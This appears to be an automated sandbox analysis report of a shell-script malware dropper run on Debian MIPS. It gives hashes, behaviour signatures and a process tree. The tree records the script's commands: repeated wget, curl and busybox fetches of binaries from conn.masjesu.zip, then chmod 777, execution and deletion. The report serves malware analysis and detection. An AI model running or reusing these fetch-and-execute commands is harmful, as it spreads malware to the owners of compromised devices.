Analysis
-
max time kernel
131s -
max time network
132s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:05
Static task
static1
Behavioral task
behavioral1
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
-
Size
10KB
-
MD5
7632ec045de4b1033e7c4b16bc1ca67d
-
SHA1
761dbef5f61fe1d3fd78c27236662b075cc559ad
-
SHA256
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e
-
SHA512
971fe55854409ae07deaca1bbdc26c698a414d163ad3eb5a9246d2da6216c552c294dde58c1df5d8d3d97c1e0323bb04a11b00cc5e8803588ba70f04f9dff75c
-
SSDEEP
192:UtRl0RBbqnWB0c7yWvxCptcUkXOIYqS7Ik4oIqS7IkuptcUkXO0c7yW1Rl0RBb44:UqInWB0c7yWvxCptcUkXOInozptcUkXD
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 856 chmod 870 chmod 884 chmod 912 chmod 996 chmod 781 chmod 802 chmod 919 chmod 982 chmod 989 chmod 877 chmod 975 chmod 1003 chmod 842 chmod 849 chmod 905 chmod 863 chmod 947 chmod 961 chmod 891 chmod 954 chmod 1010 chmod 898 chmod 940 chmod 968 chmod 743 chmod 926 chmod 933 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh 744 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys 783 S82B3midttp7tynH1d7SXU5VngkmPvSAys /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB 803 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 843 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 850 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX 857 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl 864 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj 871 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI 878 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx 885 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 892 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 899 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX 906 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet 913 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl 920 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX 927 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 934 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj 941 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI 948 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx 955 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet 962 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 969 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX 976 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 983 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh 990 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys 997 S82B3midttp7tynH1d7SXU5VngkmPvSAys /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB 1004 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 1011 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 902 curl 733 curl 1007 curl 747 curl 862 busybox 936 wget 953 busybox 918 busybox 958 curl 985 wget 993 curl 805 wget 859 wget 876 busybox 888 curl 908 wget 911 busybox 923 curl 939 busybox 749 busybox 853 curl 869 busybox 881 curl 841 busybox 860 curl 943 wget 971 wget 874 curl 972 curl 974 busybox 801 busybox 806 curl 901 wget 992 wget 986 curl 1006 wget 741 busybox 798 curl 890 busybox 946 busybox 988 busybox 995 busybox 880 wget 915 wget 929 wget 960 busybox 1002 busybox 873 wget 887 wget 937 curl 999 wget 883 busybox 904 busybox 718 wget 866 wget 925 busybox 932 busybox 867 curl 909 curl 916 curl 922 wget 746 wget 789 wget 852 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 curl File opened for modification /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 curl File opened for modification /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet curl File opened for modification /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI curl File opened for modification /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX curl File opened for modification /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx curl File opened for modification /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh curl File opened for modification /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX curl File opened for modification /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 curl File opened for modification /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj curl File opened for modification /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet curl File opened for modification /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX curl File opened for modification /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 curl File opened for modification /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 curl File opened for modification /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys curl File opened for modification /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh curl File opened for modification /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl curl File opened for modification /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI curl File opened for modification /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB curl File opened for modification /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl curl File opened for modification /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 curl File opened for modification /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 curl File opened for modification /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys curl File opened for modification /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB curl File opened for modification /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj curl File opened for modification /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx curl File opened for modification /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX curl File opened for modification /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 curl
Processes
-
/tmp/08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh/tmp/08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:718
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh./G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys./S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵PID:787
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:789
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:801
-
-
/bin/chmodchmod 777 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB./9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:805
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:848
-
-
/bin/chmodchmod 777 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30./DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:855
-
-
/bin/chmodchmod 777 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX./gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl./AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj./Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI./QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx./u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6./DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:897
-
-
/bin/chmodchmod 777 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0./9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX./0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet./8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl./AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX./gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6./DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj./Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
